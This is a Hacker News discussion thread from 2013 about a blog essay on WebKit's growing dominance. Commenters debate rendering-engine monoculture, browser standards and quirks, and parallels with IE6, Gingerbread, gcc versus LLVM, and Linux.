Hacker News new | past | comments | ask | show | jobs | submit login
Fear of a WebKit Planet (hypercritical.co)
120 points by orofino on March 4, 2013 | hide | past | favorite | 62 comments



"Consider all the embedded applications of WebKit, from game consoles to theme-park kiosks, and the idea of a homogenous, stagnating WebKit monoculture seems even more unlikely."

This is attacking a straw man. I'm not worried that WebKit isn't going to continue to improve. I'm more worried that WebKit is going to dominate so much that WebKit's implementation quirks result in de facto standards. Take the HTML Hard Disk Filler from a few days ago: the reason that WebKit can change to fix that bug is that the Web doesn't depend on the semantics that WebKit implemented. If Web sites relied on subdomains' quota not counting toward the parent domain's quota, as WebKit implemented (contrary to the recommendations of the spec), then that security issue would be much harder to fix without breaking sites.

"The proliferation of WebKit will be a rising tide that lifts all boats."

Assuming that no better engine comes along. If the Web starts to depend on WebKit's implementation, then the Web will basically be defined by this large pile of C++ code, presumably in perpetuity. That might be better in the short term, but it doesn't seem like a good long-term bet.


The concept of "WebKit's implementation quirks" implies that WebKit is a single thing when in fact it's (already) a huge diversity of different things.

http://paulirish.com/2013/webkit-for-developers/

WebKit is also constantly changing, so even the current (small) set of "implementation quirks" that really are 100% identical in all products that use WebKit will not stay the same very long.


The HTML Hard Disk Filler bug was (and still is) present in all versions of WebKit.


Let’s check back in a year. I don't share the fear of WebKit bugs that are present in every single implementation of WebKit in use today (I'm not even sure the disk filler qualifies) and that "can't be fixed because they'll break the web." Individual products that incorporate WebKit can and will choose how much bug-for-bug compatibility to maintain with each new version, and I don't think those decisions will all match up.


Have you never seen someone comment "Gingerbread is the new IE6"? What do you think that means in terms of bug-for-bug compatibility?


Having spent the mid 2000s to late 2010 doing mostly web development with having to support IE6 and IE7 and presently doing more Android development, I would gladly take Android 2.3 to IE6 or even IE7 any day.

Microsoft provided no compatibility library for IE6/7 or ease of use while Android's makes it really easy to backport along with using third party tools like ActionBar Sherlock and Holo Everywhere. Only thing really missing is going back to 2.2 (with the download api) and that's now < 10% of the market share.

In short, people that claim Gingerbread is the new IE6 are either ignorant of the Android development process or are mostly spreading FUD. I'm not the only developer out there that agrees[1]. Biggest hassle is really various DPIs and resolutions and having to provide resources for 3-4 types[2] (depending on what one supports). Though one has to do that for iOS as well to a point. Nothing under 480x800 though really matters if one is doing 2.2+.

[1] http://getmoai.com/blog/android-fragmentation-maybe-not-such...

[2] http://developer.android.com/guide/practices/screens_support...


I think fpgeek was referring to the Gingerbread browser and making sure web sites are compatible with it, not application development.


I thought about that being what he was alluding to, but that's not just a Gingerbread phenomenon so it had me think he was talking about native apps. Even on Android 4.0, the stock browser remains static unless there's an OS upgrade. It would just be kind of cherry picking to just pick on Android 2.3 in that case when every Android OS version's stock browser (outside of those that come with Chrome), is dependent on the OS version. Just a bad idea that left it dependent on the OS after seeing how that went with IE. If he's referring to Chrome only working on ICS+, that's true, but not every ICS+ device comes with it (very few do), so most people won't bother getting it any more than they would look for an alternative browser on Android 2.3.

I haven't used iOS enough to say for sure, but isn't Mobile Safari also tied to the OS version in a similar way and can't get updates without the OS being updated?


It isn't just a Gingerbread phenomenon, but Gingerbread is one of the most obvious examples of the phenomenon. It looks like half of all "active" Android devices are running Gingerbread or earlier [1], and many of those devices will never have an OS update released. It happens with iOS too, but devices generally get updates for two years before they're stranded.

But you are correct--it is far from the only example. There are major problems with iOS's model, too--once your device has received its last update, you're stuck with its rendering engine forever! Browsers using alternate rendering engines aren't allowed in the store. With Gingerbread, at least people can install a browser with a newer rendering engine.

But in general, I think the "Gingerbread is the new IE6" claims are pretty hyperbolic. IE6 remained such a scourge because so many companies wouldn't upgrade it to maintain consistency and compatibility with their custom, non-standards-compliant internal web applications. In contrast, mobile devices currently aren't kept very long, and there's quick iteration. After a few years, those Gingerbread users still using their devices can get a new browser if they're insistent on using the device, and idevice users will have to get a new idevice. But those users won't be tied to using those devices by corporate policy. At worst, I think developers will have to worry about the Gingerbread browser and older versions of mobile Safari for a few years, not the better part of a decade like with IE6.

[1] https://developer.android.com/about/dashboards/index.html


> I haven’t forgotten the past. A single, crappy web browser coming to dominate the market would be just as terrible today as it was in the dark days of IE6. But WebKit is not a browser. Like Linux, it’s an enabling technology. Like Linux, it’s free, open-source, and therefore beyond the control of any single entity.

This seems very arbitrary. So WebKit isn't a "browser". Is the author saying that a monoculture at another level is ok, but the "browser" level is somehow special and we want to keep diversity there? No, I think we need diversity at all levels.

Speaking of Linux which is the main example in the article - yes, if Linux were to become completely dominant then that would be a bad thing, even if the author calls it an "enabling technology" and is somehow ok with a monoculture there. I am a huge Linux supporter - I am running on Linux right now, my desktop has been linux for many many years now, and I encourage people to switch to it and abandon proprietary OSes like Windows and OS X - but we still don't want Linux to dominate the OS kernel space.

Thankfully Linux is not doing that. It might dominate the open source kernel space, but there is still Windows Server and OS X Server. And applications written portably can often run on all of those.

Linux is a great kernel, but it has downsides like any software. If everything ran linux, it would be very very hard to invent something better than linux and get adoption for that new thing. The same is true of WebKit.


It's not an arbitrary distinction. I see a continuum between products and "infrastructure technologies," and I think it's increasingly reasonable (and, eventually, desirable) for there to be more collaboration on a single, shared project (and less wheel reinvention) as we move toward the infrastructure end of the spectrum.

None of this precludes a changing of the guard in the future. Just ask the gcc guys about egcs and llvm…


LLVM is still fighting GCCisms. (They even had to implement a subset of GCC RTL to compile the inline asm!) The sheer amount of effort they had to go through in order to compile, say, Linux, is incredible.

Besides, by your argument, LLVM should never have been started, because they should have contributed to GCC. Yet I'm very glad they did, because LLVM is much more hackable and this flexibility has enabled many new projects, like Emscripten and llvmpipe.


That's not my argument. It's a cycle. People tried to contribute to gcc, but eventually reached some limits (real or imagined, it doesn't matter) and created something new. egcs was another, similar crisis with a slightly different outcome. This is all part of the process. It's never easy, but progress is made. And we all enjoy nice things between the big upheavals.


The limits reached are very real. The technical problems are quite fundamental and serious, but possibly fixable. But the political problems make it impossible to solve these technical ones.

See Chandler Carruth's talk "Clang: Defending C++ from Murphy's Million Monkeys". At the beginning between 2:20 and 4:00, he quotes Richard Stallman's response to their proposed changes and demonstrates that using gcc is a non-starter.

http://channel9.msdn.com/Events/GoingNative/GoingNative-2012...


And, most importantly, they are finally providing GCC some <i>desperately</i> needed competition.


  | LLVM is still fighting GCCisms
And yet this doesn't affect everything. Didn't Apple switch from gcc to the Intel C compiler? Does the Intel C compiler implement all of gcc's quirks?


Apple switched to LLVM from GCC. Chris Lattner, LLVM primary author works for Apple.


IIRC, I remember talk of Apple switching to the Intel C compiler ~ a year or so after the Intel switch. I'm not an Apple dev, so I don't have first-hand knowledge.


No. I am an Apple dev. At least publicly, this never happened.

But Intel did have a presence at WWDC when the Intel switch announcement was made. Intel was trying to sell developers licenses to the Intel compiler (as they should).


Of course it doesn't affect everything, nor does it make anything 100% impossible. It just makes it potentially much harder.

A huge corporation like Apple will typically be able to overcome the additional effort.


> None of this precludes a changing of the guard in the future. Just ask the gcc guys about egcs and llvm…

By all means, ask the LLVM people about all the work they had to do to overcome the single-implementation status of gcc. clang must support gcc's arguments and behavior very carefully, and still cannot build all open source projects, simply because so many open source projects - including the linux kernel btw! - have been designed with only gcc in mind.

LLVM managed to overcome that through a lot of effort. LLVM is funded by Apple, a massive multinational, one of the largest tech companies in existence and of all time. Not all new projects have that luxury. In an ideal world, you don't need those kind of resources to challenge an existing implementation.


LLVM was created by one person, just like Linux. Both projects would not be where they are today without the efforts and monetary contributions of many others, including corporations. These are examples of the system working, IMO. Giants can be felled, tools and infrastructure can be improved for all.


If by "working" you mean linux succeeding through huge amounts of funding by IBM and others and LLVM through huge amounts of funding by Apple and others. Yes, both were founded by one person, but that is highly irrelevant here.

Both of your examples clearly show that it takes huge resources to overcome a single implementation in a field. That is far from optimal, it means the barrier is so high that innovation is being stifled.

As another example, look at the single-implementation status of Microsoft Office. Despite huge investments and efforts by multiple parties in the industry, it remains essentially unassailable.

The best way to avoid that is to not have a single implementation, but rather to have standards, and to have good open source implementations of those standards.


> Both of your examples clearly show that it takes huge resources to overcome a single implementation in a field. That is far from optimal, it means the barrier is so high that innovation is being stifled.

I think it's more optimal than the alternatives tried so far. You're ignoring the "period of peace" between upheavals during which (almost) the whole world is working together to make something better for everyone. That more than makes up for the difficulty of dethroning (or forking) the king when needed.

Office is a closed-source product controlled by a single company, not analogous at all to WebKit.


I don't disagree that there is a benefit as well, to a monoculture. It does avoid redundant effort.

But the cost is quite high.

10 implementations might be a lot of overhead. But a monoculture of 1 is too little. 2 or 3 might be an optimal number.


We already have two or three powerful entities working on WebKit, pulling it in whatever directions suit their needs. If they ever pull hard enough or far enough in different directions, it could tear (fork) and the cycle begins again. And anyone is free to learn from WebKit and create something better (as Apple learned from Gecko before adopting KHTML).

"Monoculture" is a loaded word. The differing priorities that might manifest in completely separate web rendering engines still have plenty of room to manifest when multiple big players are working on WebKit, with nothing stopping any of them from forking if the differences get too large.

(And anyway, Gecko does still exist, after all…)


With a very optimistic outlook like yours, there is nothing to worry about: Everything will work out, these are just cycles in the industry. What could go wrong?

But we already see problems today from WebKit's dominance on mobile. Non-WebKit browsers have trouble rendering the mobile web which was designed with only WebKit in mind. It got so bad that Opera just gave up and adopted Chromium (not even just WebKit).

The remaining non-WebKit browsers, IE and Firefox, are left with an even bigger problem and it is even harder for them to disrupt the WebKit mobile web. And it would be even harder for a completely new engine.

So general arguments about cycles and all that might sound good, but we already see the damaging effects of WebKit monoculture (you argue it's a loaded word, but it fits).


I'd say we already see the benefits of having so many people work together on WebKit. Would we be better off if Google had to create and maintain its own desktop and mobile web rendering engine from scratch? If there's a monoculture problem in mobile web browsing, it's due to the disproportionately large percentage of it that's done using Mobile Safari on iOS. Single-vendor/closed-platform will always be a problem. WebKit is neither.

Yes, over-use of vendor prefixes in CSS and other browser-specific features is bad. But that's an authoring issue as much as it's a WebKit issue. Having -moz-, -o-, and -webkit-* plus JavaScript shims to hide the differences in multiple browsers is a great argument for standards, but not a great argument for a larger variety of independently developed and maintained web rendering engines.


> I'd say we already see the benefits of having so many people work together on WebKit.

Of course, as I already agreed before. There are benefits to centralization.

It's a question of degree, not absolutes. As I said, 10 or 100 might be too many rendering engines, while 1 is too few. 2 or 3 seems, to me, to be optimal, but again this is a matter of degree so others may prefer a little more or less.

> Yes, over-use of vendor prefixes in CSS and other browser-specific features is bad. But that's an authoring issue as much as it's a WebKit issue. Having -moz-, -o-, and -webkit-* plus JavaScript shims to hide the differences in multiple browsers is a great argument for standards, but not a great argument for a larger variety of independently developed and maintained web rendering engines.

Agreed, this is not just a WebKit monoculture issue - plenty of other problems in that area as well, as you say.


In general, I agree with you. But in this specific case, we may not be able to extrapolate Linux/LLVM's success to web. Yes, you can create a toy kernel for yourself. You don't have to be POSIX-compliant from day one, or run OS/2 apps, or whatever. And you can create a more standard compiler that's not capable of compiling most programs that use gcc's esoteric features. They can have little niches for years, and slowly gain traction (from end-users and also developers).

But I don't think that you can do the same in browser space. If you want to create a new rendering engine, it absolutely, positively has to render 95+% of most-visited websites from early stages of development (before you "ship" a browser). Nobody would use a half-baked browser that's unable to render most websites. So, you have to also support WebKit's bugs-turned-into-standards.

In another words, you don't compile 500 different programs in a single day - if LLVM can compile the one program that your company is developing faster and better, it's a good fit for you. But you visit hundreds of websites a day. If a new engine can't display even 10% of them correctly, it'd a show stopper.

So, your choices are to either fork WebKit, or create a new engine that "simulates" most mainstream WebKit engines. Both result in WebKit becoming more and more of an standard.


As some one who (peripherally) lived through the gcc/egcs schism, I'd certainly love to hear their perspective on open-source monoculture. Somehow I don't think it would be nearly as monoculture-friendly as you do.


> Like Linux, it’s an enabling technology. Like Linux, it’s free, open-source, and therefore beyond the control of any single entity.

As SQLite3 is.

Bring back WebDB!


A Linux monoculture is never going to happen. But what would actually be wrong with it?


As I said, it means that code would be written to Linux specifically. What works on linux, what is fast on linux, etc., would be what people write to.

So if someone invented a new kernel that is better than linux, it would have two problems: The usual problem of getting adoption and interest in a new project, but also the problem of all existing code being designed with linux in mind.

Whereas today, people generally try to write code that runs well not just on linux but also on other kernels. Not because they have lofty ideals necessarily, but because there are other kernels.

If we had only linux, that wouldn't be the case.

This is the basic question of standards. Open source is great - as I said above, I have been a huge supporter for a very long time - but standards are an orthogonal issue to open source, and just as important. Writing to standards instead of the bugs/idiosyncrasies of a single implementation is the only thing that makes it easy for new implementations to show up. And standards are dead when there is a single implementation.


A Minix monoculture never happened. But what would actually have been wrong with it?

Think of all of Tanenbaum's design decisions that Linus ended up changing. One big reason we know, in detail, what would have been wrong with a Minix monoculture is that it never happened.


Assuming that Minix adopted a reasonable license and fixed outstanding issues that make Linux currently better, I'm asking you to tell me what's wrong with that. We have a de facto monoculture of Windows on the PC right now and I don't think that's better.


I didn't say what sort of Minix monoculture we might have wound up with. In particular, who says the licensing would have been fixed? Without Linux's success how many people would have thought there was a problem?


"As someone whose memory of perceived past technological betrayals and injustices is so keen that I still find myself unwilling to have a Microsoft game console in the house..."

I wonder how many war refugees from that era feel the same way. I won an xbox and gave it away to charity because I didn't want it in my house either.


I certainly do feel that way.

The market has handed Microsoft several monopolies. Many times they've squandered those opportunities, leaving a bunch of pissed off customers in their wake.

I don't really see any evidence that anything has changed recently at Redmond.


I wouldn't go that far, I have Xbox and Windows. But I always feel a little dirty when I buy anything from Microsoft and if I end up liking it I feel a little guilty for liking it.


There's something to be said here about the constituents of the Webkit Project and to compare it to Kernel.org.

Somehow I feel secure knowing someone like Linus is in-charge. Maybe because the Linux project isn't maintained by people whose ultimate goal is profit?


Wouldn't monocultures be susceptible to the innovator's dilemma? Consider if WebKit, or Linux, hypothetically became completely dominant. It would eventually collapse under its own weight and become bloated. If a rising new kernel or rendering engine is sufficiently better than the dominant "standard", then it could become a real challenger to it. From a very superficial perspective, I view the growth of Chrome at the expense of Firefox as such a phenomenon.


I fear that you are allowing your memory of the past cloud your judgment of the present. I steadfastly resisted IE even in the days of IE 4, where it was clearly superior to Netscape 4. When Microsoft allowed IE to go dormant, my hatred for it blossomed in the same manner that affected many of us here. And today, I will freely admit that I retain leftover bitterness about Internet Explorer. I remain absolutely committed to the Mozilla cause as a result.

And yet I acknowledge that I am closed-minded in my religious support of Mozilla. I have had my bouts of doubt, and most recently wrote about my awe over Microsoft's IE 10 benchmarks [1]. Obviously I want to rationalize the benchmarks as tilted toward IE, but to be honest with myself, I have to admit that IE 10's performance--rendering performance in particular--is quite shocking.

Observing the hardware acceleration of IE 10 on my i7 3770K with a discrete nVidia GPU fills me with regret that I cannot stomach the use of Internet Explorer. I know I am squandering CPU and GPU cycles using a browser that is decidedly less efficient. And simply because I am familiar with my favorite browser's UI and because I like its particular quirks more than the other guy's quirks.

Here is how I rationalize my behavior, though: I love that Mozilla has two competitors. I love that they are being motivated to continuously improve their hardware acceleration (among other things) by attacks on two fronts. I'd like even more competition, but two major competitors will suffice. I feel that the good-natured rivalry between the three major teams is a very good thing.

My fear is that without a sufficiently wide field of competitors, certain areas of innovation will shrivel away. As evidenced by the IE 10 benchmarks, especially those related to hardware acceleration, both Mozilla and Apple/Google have not to-date made hardware acceleration a priority. At least not on the desktop, which is where I do most of my web consumption.

I am hopeful that IE 10's kick in the rear will give them a little incentive to snap out of their complacency. I would love a Firefox build with the hardware accelerated rendering performance of IE 10.

I'm not worried about a monoculture insomuch that the particular rendering quirks of Webkit will be deemed the Holy Standard of the Web. To a degree, that's already the case, at least on mobile. As regrettable as that is, it's not my particular worry. Rather, I am worried about a monoculture because it inevitably reduces innovation, oftentimes in subtle ways that aren't immediately obvious and that we may not be able to perceive because the alternate possible course of history is closed off.

If Microsoft were not pushing the hardware acceleration envelope, evidently no one would be. (Actually, to be clear, we'd simply accept the degree to which Google, Apple, and Mozilla are focused on hardware acceleration to be a reasonably degree of focus because there would be no counter-example available.) And we would probably all consider the rendering performance of Chrome and Firefox to be good enough. "Good enough" sucks, as I have ranted at length about elsewhere. Good enough is one of the worst sentiments in technology.

No, it's absolutely not good enough that the background animation of my blog causes lesser computers to bog down to a crawl (go ahead, take a look and post your complaints). It should not be so computationally intensive to do relatively trivial SVG/SMIL animation in a browser. (Irony: IE 10 doesn't support SMIL, so I can't vouch for its ability to animate my background; what I do know is that it makes the section navigation animation look absolutely effortless compared to Chrome and Firefox.)

I fear the loss of competition because of what that means for innovation. It entrenches "good enough," and I hate that.

[1] http://tiamat.tsotech.com/lets-all-use-webkit


With respect to IE 10 performance, Microsoft only has to worry about one platform (debate-ably two if you want to talk about Win8 on ARM).

  | I fear the loss of competition because of what
  | that means for innovation. It entrenches "good
  | enough," and I hate that.
Being Open Source gives us a leg-up over the IE monoculture era. People with the willingness can improve it; fork it if necessary.


Can we please always try to remember that before the scourge that was IE, we had the scourge that was Netscape? If you go back and read through the W3C mailing lists people really really hated Netscape (the by-far dominant web browser at the time, for which books on HTML would have sections dedicated to optimizing for and would even go as far as to say being Netscape-only was fine) for seemingly making up HTML as they went along (almost all of the stuff in HTML that is deprecated, including all of the markup that was for style and presentation only, were Netscape-only HTML extensions) and refusing to take up the charge of CSS. Microsoft was even occasionally described as the potential savior that would come in with a second implementation that paid attention to them (and in fact you then find a ton of praise on the list from Microsoft publishing open DTDs from IE).


Firefox has a very similar hardware acceleration to IE. The IE demos are often constructed to expose optimizations that IE does and other browsers don't [1].

[1] http://robert.ocallahan.org/2011/03/investigating-performanc...


I think it's difficult that the current state of things fall into stagnation. Firefox, for instance, still supports Gecko, which is open source too.


True. Unfortunately, Gecko doesn't have the weight behind it that Webkit has and the most contributions to Gecko stem from Mozilla itself. Slightly off-topic: since a customer doesn't care what rendering engine they are using, I believe Firefox is making a mistake by not releasing a WebView based Firefox browser for iOS (like Chrome did). If only to provide tabs/booksmarks syncing.


This is a great article. I think a lot of people are assuming that WebKit plays a much bigger role than it really does in browsers.


Something people often seem to miss is that if everyone switches to building their browsers with Webkit, then if you come up with a better engine, you have immediately leapfrogged all of the competition at once.

Servo, I am looking at you.


You can't leapfrog the competition if rendering modern websites requires implementing the competition's feature set bug-for-bug at near 100% levels. Remember IE and Netscape?


Remember Chrome?


"Linux is the canonical open source success story"

Couldn't help but pause and reread that.


There has been a browser available for free for over 13 years for anyone to take. It comes from a little foundation called Mozilla. Webkit is not novel here


If the success of Webkit is analogous to the success of Linux, does that mean we can expect a "Webkit Standard Base" in a few years?


This. "The proliferation of WebKit will be a rising tide that lifts all boats."


> Linux solved the Unix problem—for everyone.

Uhm... not exactly.


Fear is irrational.


That is certainly not the case in general. There are a lot of things people don't do because they fear the consequences, and for good reason. E.g. why do I not swerve my car into oncoming traffic? Why not quit my job and play videogames all day? Why not do any number of foolish things? Because of fear.

"A man who has no fear has lost a friend."


"A man who has no fear has lost a friend."

I like that quote, where's it from? My google-fu can't find anything like it.


I'm pretty sure it's in either Name of the Wind or Wise Man's Fear, but damned if I can find it. I sure as hell didn't come up with such a good quote myself.


Except when its justified.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: